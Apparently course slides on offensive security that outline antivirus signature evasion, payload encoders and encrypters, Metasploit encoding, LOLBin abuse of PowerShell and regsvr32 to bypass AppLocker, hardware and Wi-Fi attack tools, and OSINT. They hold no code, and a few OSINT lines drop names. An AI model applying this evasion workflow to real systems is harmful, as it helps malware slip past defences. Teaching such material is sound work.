Windows

Credential Attacks
UNIT - 5
 Process of finding the antivirus signature
from a detected file
Analyzing the detected file
• Once the antivirus software has flagged a file, it's important to understand the
structure of the file and identify the specific part that triggers the antivirus
detection.
• This can be done using various reverse engineering tools like disassemblers,
debuggers, and hex editors.
Identifying the signature
• Antivirus software uses signatures to identify known malware or suspicious code
patterns. A signature is a unique sequence of bytes or a pattern within the file.
• By analyzing the detected file and comparing it with known malware samples,
it's possible to identify the specific signature the antivirus is using to detect the file.
 Process of finding the antivirus signature
from a detected file
Modifying the file to evade detection
• Once the signature has been identified, the file can be modified in such a way that the
signature is no longer recognizable by the antivirus software.
• This can be done by changing the code, encrypting the payload, or using other
obfuscation techniques to alter the signature while maintaining the functionality of the
file.
Testing the modified file
• After modifying the file, it's essential to test it against the antivirus software to confirm
that it no longer triggers detection.
• This may require multiple iterations of modification and testing, as antivirus software
often employs multiple layers of detection, including heuristic analysis and behavioral
analysis.
 Process of finding the antivirus signature
from a detected file
Updating the antivirus software
• As a responsible user, it is crucial to report the bypass to the antivirus vendor
so that they can update their software and improve detection capabilities.
• This helps to keep the digital ecosystem secure for all users.
 Encoders and Encrypters
The purpose of encoders and encrypters is to obfuscate the payload, making it
harder for antivirus software and other security tools to detect the malicious code.

Encoders
• An encoder is a tool used to transform a payload's binary data into a different
representation while maintaining the original data’s integrity.
• The primary goal of an encoder is to avoid specific patterns or characters that
might trigger antivirus detection or cause issues with payload delivery.
 Encoders and Encrypters
• For example, certain characters might not be allowed in some systems or could be
easily recognized by security tools.

• Encoders use various encoding schemes, such as Base64, XOR, or custom

algorithms, to transform the payload data into an alternative representation
that does not contain these problematic characters or patterns.

• However, encoding is not meant to provide confidentiality.

• It is relatively easy to reverse the process and obtain the original payload if the
encoding scheme is known.
 Encoders and Encrypters
Encrypters
• An encrypter is a tool that uses cryptographic techniques to secure and conceal
a payload's content.
• Unlike encoders, encrypters aim to provide confidentiality and ensure that
unauthorized parties cannot easily understand or analyze the payload.
• Encrypters use various encryption algorithms, such as AES, RSA, or custom
algorithms, to encrypt the payload data.
• These algorithms require a key to encrypt and decrypt the data.
• Only parties with the correct key can decrypt and access the original payload.
 Encoders and Encrypters
Encrypters add an additional layer of security compared to encoders, as
decrypting the payload requires knowledge of the encryption algorithm and the
key.

However, this also means that the malware must include a decryption routine and the
key within its code or rely on a separate mechanism to decrypt the payload before
execution.
 Using Metasploit, How we can evade antivirus and bypass
detection

• Metasploit provides a feature called "payload encoding" to help with antivirus evasion.

• The primary goal of payload encoding is to modify the payload’s binary

representation to bypass signature-based detection methods employed by antivirus
software.

Selecting a payload
• In Metasploit, a payload is the code that will be executed on the target system upon
successful exploitation.
• Metasploit offers various payloads, such as reverse shells or Meterpreter sessions, which
can be used depending on the tester's needs.
 Using Metasploit, How we can evade antivirus and bypass
detection

Encoding the payload

• Metasploit provides several encoders to modify the payload's binary data.
• These encoders use different encoding techniques, such as XOR or custom
algorithms, to change the payload’s appearance while maintaining its functionality.

Generating the executable

• Once the payload has been encoded, Metasploit can generate an executable file
that contains the encoded payload along with a stub (a small piece of code) that
is responsible for decoding the payload at runtime.
 Using Metasploit, How we can evade antivirus and bypass
detection

Evading antivirus detection

When the target system receives and runs the executable, the stub will decode
the payload, and the payload will be executed without being detected by the
antivirus software, provided that the encoding was successful in bypassing the
antivirus signatures.
 LOLbins
• Living off the Land Binaries (LOLBins) are legitimate, pre-installed system tools or
binaries that attackers can abuse to perform malicious activities.

• In offensive security testing, LOLBins are used to blend in with the target environment,
making it difficult for security tools and system administrators to differentiate between
legitimate and malicious activities.

• LOLBins are often used by attackers to bypass security measures, such as antivirus
software or application whitelisting, as they are trusted and allowed to execute on the system.

• The use of LOLBins can also reduce the attacker’s footprint, as there is no need to
download or install additional malicious software.
 LOLbins
• Here's an example of how LOLBins can be utilized in offensive security testing: PowerShell is a
powerful scripting language and automation tool included in the Windows operating
system.

• PowerShell can be used to perform various administrative tasks, but it can also be misused
by attackers as a LOLBin for malicious purposes.

• One possible use case of PowerShell in offensive security testing involves downloading and
executing a remote script.

• Using LOLBins in offensive security testing can help security professionals identify
weaknesses in an organization's defenses and better understand how attackers might exploit
such tools to compromise systems.
 Applocker

• AppLocker is a security feature introduced in Windows 7 and Windows Server

2008 R2 that allows administrators to control the execution of applications,
scripts, and executable files based on publisher, file path, or file hash.

• AppLocker is designed to prevent unauthorized software, including potentially

malicious applications, from running in a managed environment.

• It provides a flexible mechanism to create allow, and deny rules based on

organizational policies.
 Applocker
• While AppLocker is a useful security feature, it is not foolproof, and skilled attackers
may attempt to bypass it.

• One technique to bypass AppLocker involves using Living off the Land Binaries
(LOLBins) - legitimate system tools or binaries that can be abused to perform malicious
activities.

• Since AppLocker relies on whitelisting applications, attackers can leverage built-in

Windows binaries with legitimate purposes and execute arbitrary code or scripts.

• By using LOLBins, attackers can bypass AppLocker restrictions because these binaries
are usually trusted and allowed to run.
 Applocker
• Example of bypassing AppLocker using LOLBins

• One popular LOLBin is the Microsoft-signed binary "regsvr32.exe", which is

used to register or unregister COM (Component Object Model) DLLs
(Dynamic Link Libraries).

• However, it can also be used to execute arbitrary code or scripts remotely.

Hardware Hacking Tools
Chip whisper:The first open-source, low-cost
solution to expose weaknesses that exist in
embedded systems all around us.

The Bus Pirate is simple and effective - type commands into a

terminal on your computer, those commands are interpreted by
the Bus Pirate and sent via the proper protocol. The Pirate will
also interpret data sent from your embedded device back to your
computer terminal.

The Saleae Logic 8 is a powerful logic analyzer

that lets you record and display signals in your
circuit, so you can debug it fast.
On-chip debug (OCD) interfaces can provide chip-level control of a target
device and are a primary vector used by engineers, researchers, and
hackers to extract program code or data, modify memory contents, or affect
device operation on-the-fly. Depending on the complexity of the target
device, manually locating available OCD interfaces can be a difficult and
time consuming task, sometimes requiring physical destruction or
modification of the device.
JTAGulator is an open source hardware tool that assists in identifying OCD
interfaces from test points, vias, component pads, or connectors on a target
device.
 Wifi and USB Hacking Tools

1. USB Rubber Ducky

•Looks like a flash drive, but emulates a keyboard.
•Executes pre-programmed keystroke payloads rapidly.
•Ideal for social engineering, quick access attacks.

•2. Bash Bunny

•Like Rubber Ducky, but more advanced.
•Can act as a keyboard, network adapter, USB storage, etc.
•Runs multiple attack payloads (exfiltration, spoofing, etc.).
3. LAN Turtle
•USB device that creates a backdoor into a network.
•Provides remote access, DNS spoofing, packet capture.
•Ideal for physical access attacks in corporate environments.

4. Cactus WHID
•Wireless HID injector (USB Rubber Ducky + ESP8266 WiFi).
•Can be controlled remotely via Wi-Fi.
•Great for long-range keystroke injection.

5. Digispark / MalDuino
•Cheaper alternatives to Rubber Ducky.
•Emulate HID devices for custom keystroke attacks.
1. Alfa AWUS036NHA / AWUS036ACH
•High-gain USB Wi-Fi adapters.
•Known for monitor mode, packet injection
support.
•Compatible with Kali Linux, Aircrack-ng,
Bettercap.

2. WiFi Pineapple (by Hak5)

•Dedicated Wi-Fi pentesting tool.
•Supports man-in-the-middle attacks,
deauthentication, credential harvesting.
•Web UI makes it user-friendly.

3. ESP8266/ESP32 Deauther
•Low-cost microcontroller used for Wi-Fi deauth
attacks.
•Can kick clients off networks or simulate fake
APs.
4. Bettercap
•Powerful MITM and packet manipulation framework.
•Works over Wi-Fi, Bluetooth, Ethernet.
•Great for credential sniffing and spoofing.

6. Kismet
•Wireless sniffer and intrusion detection tool.
•Supports Wi-Fi, Bluetooth, ZigBee.

7. Fluxion
•Social engineering-based Wi-Fi attack tool.
•Creates a fake AP, asks users to re-enter the Wi-Fi password.
What is the OSINT?
• OSINT (Open Source Intelligence) tools allow for the efficient gathering
and analysis of publicly available data, which is
used by government agencies and private organizations to analyze
market trends, brand positioning, and more. These tools have
advanced from traditional media to incorporate technologies like web
scraping, social media analytics, geospatial intelligence, and AI to
improve precision and speed in data processing.
OSINT Framework
• The OSINT Framework provides a structured approach to gathering publicly
available information, benefiting security researchers, government
agencies and cybersecurity professionals in information gathering.
• Structured with a systematic methodology, the OSINT Framework categorizes
gathered information according to:
• Source
• Relevance
• Type
• Context
Source:
osintframework.com
Utilizing OSINT Tools for Effective Data
Harvesting
• Search Engines and Directories

According to Statcounter,owns a 61% market share in China, and Yandex, commanding over 71% of the Russian desktop
search market (source: Statista), are essential for OSINT due to their widespread use. These search engines provide a
wealth of localized data that can be leveraged for intelligence gathering.

Moreover, region-specific search engines such as Naver in South Korea and Seznam in the Czech Republic are
particularly useful for OSINT, providing localized and tailored search results relevant to their respective areas.

• Social Media Monitoring

A social media search engine, focuses on specific terms and phrases, pulling results from over one hundred
social media platforms. This tool allows analysts to gather a vast amount of information from various platforms, enhancing
their ability to gather comprehensive data.

Trendsmap is used to analyze trending Twitter keywords and hashtags, featuring a robust spam detection
system to ensure trend authenticity. Similarly,Hashatit allows users to search and analyze active hashtags across multiple
social media platforms, collecting related posts in one place.

• Deep and Dark Web Exploration

TorBot, a Python-based OSINT tool for the dark web, is designed to crawl and index .onion sites, returning
information such as page titles, addresses, and descriptions, while storing the results in a JSON format.
Intelligent Cycle
Stages in lifecycle
• Direction:
The direction phase of the lifecycle is when you set goals for the threat intelligence program.
• Collection:
Collection is the process of gathering information to address the most important intelligence
requirements.
• Processing:
Processing is the transformation of collected information into a format usable by the
organization. Almost all raw data collected needs to be processed in some manner, whether by humans
or machines.
• Analysis:
Analysis is a human process that turns processed information into intelligence that can
inform decisions.
• Dissemination:
Dissemination involves getting the finished intelligence output to the places it needs to go.
• Feedback:
Critically important to understand your overall intelligence priorities and the requirements of
the security teams that will be consuming the threat intelligence.